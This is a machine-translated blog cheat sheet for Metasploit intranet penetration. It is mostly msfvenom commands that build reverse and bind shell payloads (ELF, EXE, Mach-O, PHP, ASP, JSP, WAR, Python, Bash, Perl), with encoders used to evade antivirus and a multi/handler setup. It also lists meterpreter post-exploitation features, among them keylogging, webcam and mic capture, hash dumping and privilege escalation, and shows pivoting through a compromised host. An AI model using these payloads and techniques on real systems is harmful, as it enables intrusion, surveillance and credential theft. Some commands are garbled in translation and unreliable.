Infiltration Artifact Series Metasploit

Learn to walk before you run
Learn first, then learn to run

Today I played an intranet penetration, which mainly used metasploit this intranet penetration artifact. Metasploit is definitely no stranger to me, I have been in contact since long ago, but every time I re-use it, I will forget some usages, so in order to facilitate the query, I have some common commands of metasploit artifacts in this record, as well as intranet penetration. How to use it.

Installing metasploit under Mac

Installing metasploit under mac is relatively simple. The official website downloads the pkg installation package and installs it directly; you need to pay attention to the path after the installation is complete.
Msfconsole path:

1
/opt/metasploit-framework/bin

There are several other commonly used tools in this directory:

Msf plugin path:

1
/opt/metasploit-framework/embedded/framework/modules/exploits

msfvenom

Role: Generate Trojan files, replacing the earlier versions of msfpayload and msfencoder.

Options

The msfvenom command line options are as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
-p, --payload <payload> specifies the payload to be used (attack load)
-l, --list [module_type] Lists all available resources for the specified module. The module types are: payloads, encoders, nops, all
-n, --nopsled <length> pre-specify a NOP slide length for the payload
-f, --format <format> Specifies the output format (use --help-formats to get a list of output formats supported by msf)
-e, --encoder [encoder] Specify the encoder to be used
-a, --arch <architecture> specifies the target architecture of the payload
--platform <platform> specifies the target platform for the payload
-s, --space <length> Set the maximum length of the effective attack payload
-b, --bad-chars <list> Set the evasion character set, for example: &#039;\x00\xff&#039;
-i, --iterations <count> specifies the number of times the payload is encoded
-c, --add-code <path> specifies an additional win32 shellcode file
-x, --template <path> Specify a custom executable as a template
-k, --keep protects the action of the template program, and the injected payload runs as a new process
--payload-options enumerates the standard options for payload
-o, --out <path> save the payload
-v, --var-name <name> specifies a custom variable to determine the output format
--shellest minimizes the generation of payloads
-h, --help View help options
--help-formats View a list of output formats supported by msf

options usage

View the list of supported payloads:

1
msfvenom -l payloads

View supported output file types:

1
msfvenom --help-formats

Check the supported encoding: (in order to achieve the effect of killing)

1
msfvenom -l encoders

View the supported empty field modules: (in order to achieve the effect of killing)

1
msfvenom -l nops

Basic payload

Command format

1
msfvenom -p <payload> <payload options> -f <format> -o <path>

Linux

1
2
3
4
Reverse connection:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Forward connection:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

1
2
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads

PHP

1
2
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

1
2
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.wa
Scripting Payloads

Python

1
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

1
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

1
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Linux Based Shellcode

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

1
2
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers

payload plus encoding

Command format:

1
msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>

Common coding:

1
2
x86 / How to do it
cmd/powershell_base64

example:

1
2
3
4
5
```
Generate an execution calculator payload example:
```bash
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe

payload pit

Under normal circumstances, the Trojan file generated by msfvenom can be directly uploaded to the target server to run (plus permissions). But I have encountered a pit myself, and some of the generated file content is useless, which will cause an error, as shown in the following figure.


The solution is a vim file that deletes invalid content from the first two lines of the file.

msfconsole

Role: used to start metasploit on the command line.

After startup, you can see the current version of metasploit and the number of plugins for each module.

  • auxiliary scanning module
  • exploits exploit module
  • payloads
  • encoders coding module
  • nops empty character module

search finding module

For example, look for the exploit plugin for the ms15_034 vulnerability.

1
search ms15_034

Earlier I introduced how to use msfvenom to generate Trojan files. Here I will show how to use the msf connection to execute the Trojan files to reach the target server.

Commonly used payload

First, let’s review the command to generate a Trojan file, which has a payload option, a few commonly used payloads.
Linux related payload:

1
2
3
4
5
6
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp

Windows related payload:

1
2
3
4
5
6
7
8
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

Note: x64 only works with target servers for 64-bit operating systems, no x64 or x86 for 32-bit operating systems only; modules with meterpreter will bounce meterpreter_shell, while normal shell modules will only bounce ordinary shells (rebound results) Similar to nc); reverse_tcp means that the Trojan will actively connect to the target server, bind_tcp means that the Trojan will listen to the local port and wait for the attacker to connect. Therefore, the Trojan files generated should be determined on a case-by-case basis.

payload selection

The previous introduction of the commonly used payload, then the three major elements of the payload selection are as follows:

  • The direction of the Trojan connection
  • Target operating system and version
  • Shell type of bounce

Trojan connection direction:
The msf trojan is divided into a forward connection and a reverse connection. The forward connection is suitable for the case where the attack function is connected to the target machine. The reverse connection uses the target function to connect to the attack machine. The connection mentioned here generally refers to a port of the tcp. . Therefore, before generating a Trojan, you need to determine the current environment, suitable for a Trojan horse connected in the forward direction or a reverse connection. (You can use the nc tool to test, for details: [[Infiltration Artifact Series] nc] (https://thief.one/SecWeb/%2F2017%2F04%2F10%2F1%2F))

Target operating system type view: This is not to say!
Operating system digits view:

1
getconf LONG_BIT

Rebound shell type:
This mainly depends on the purpose of the rebounding shell. Generally, if the system command is executed, the shell of the ordinary operating system is enough. If you want to use advanced features such as: keylogger, turn on the camera, add routing, etc., you can use meterpreter_shell.

Connecting Trojans

Turn on msf and enable the exploit/multi/handler module.

1
2
3
4
5
6
use exploit/multi/handler
set payload linux/x86/meterpreter/bind_tcp
show options
MOST set 10.0.0.1
set LPORT 12345
exploit

Note: The payload of the set here is the same as the payload used by the generated Trojan. The rest of the parameters are filled in according to the selected payload.

meterpreter shell

When we get the meterpreter_shell of the target server, we can do a lot of things.

1
2
3
Background puts the msf process in the background
Session -i 1 Drag the process back to the foreground
Run vnc remote desktop open

File management features:

1
2
3
4
5
6
7
8
Download Download File
Edit edit
Cat View
Mkdir creation
Mv move
Rm delete
Upload upload
Rmdir delete folder

Network and system operation:

1
2
3
4
5
6
7
8
9
10
11
Arp see ARP buffer table
Ifconfig IP address network card
Getproxy get proxy
Netstat view port link
Kill end process
Ps view process
Reboot restarts the computer
Reg modify the registry
Shell get shell
Shutdown shut down the computer
Sysinfo get computer information

User actions and other features are explained:

1
2
3
4
5
6
7
8
9
10
11
Enumdesktops user logins
Keyscan_dump keylogger - download
Keyscan_start keylogger - start
Keyscan_stop keylogger - stop
Uictl gets control of the keyboard and mouse
Record_mic audio recording
Webcam_chat View camera interface
Webcam_list View camera list
Webcam_stream camera video capture
Getsystem gets high permissions
Hashdump Download HASH

meterpreterAdd a route

Most of the time we get the meterpreter shell on the intranet, and we need to proxy to the target intranet environment to scan its intranet server. At this time, you can use the route function to add a route to the intranet of the target server.

View the shell network environment:

1
meterpreter>run get_local_subnets

Add a route to the target server intranet

1
Meterpreter>run autoroute -s 100.0.0.0/8 (depending on the target intranet)

View routing settings:

1
2
3
4
```
In general, setting a route in the meterpreter can achieve the purpose of accessing its intranet. However, sometimes it will fail. At this time, we can return msf> to the background and check the routing outside.
```bash
route print

If no routing information is found, the route set by the meterpreter shell does not take effect. We can add a route to msf.

1
msf>route add 10.0.0.0 255.0.0.0 1

Description: 1 indicates session 1. If the attacker wants to access the resources of the network segment 10.0.0.8/8, the next hop is session1. As for what is next, there is not much to say here. Anyway, the attacker can access the intranet anyway. Resources are gone.

meterpreter port forwarding

Suppose that we have scanned a certain ip of 10 network segments with mysql weak password and account password. Then we can log in to the target server mysql on the broiler server. Of course, if I want to log in to mysql on the attack machine, I can use port forwarding. (In some cases, the machines on the intranet cannot ssh each other and need to log in to the bastion machine)

In the meterpreter shell, type:

1
meterpreter> portfwd add -l 55555 -r 10.0.0.1 -p 3306

  • There are a lot of information about metasploit usage on the web. Here are some common usages and some pits in personal use.

Reference article:
http://www.freebuf.com/sectool/72135.html
http://blog.csdn.net/lzhd24/article/details/50664342
http://blog.csdn.net/qq_34457594/article/details/52756458
http://www.freebuf.com/sectool/56432.html
http://www.freebuf.com/articles/network/125278.html

Portal

[[Infiltration Artifact Series] DNS Information Query] (http://thief.one/2017/07/12/1/)
[[Infiltration artifact series] nc] (http://thief.one/2017/04/10/1/)
[Infiltration artifact series] nmap
[[Infiltration Artifact Series] Fiddler] (http://thief.one/2017/04/27/1)
[Infiltration Artifact Series] Search Engine
[[Infiltration Artifact Series] WireShark] (http://thief.one/2017/02/09/WireShark%E8%BF%87%E6%BB%A4%E8%A7%84%E5%88%99/)

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: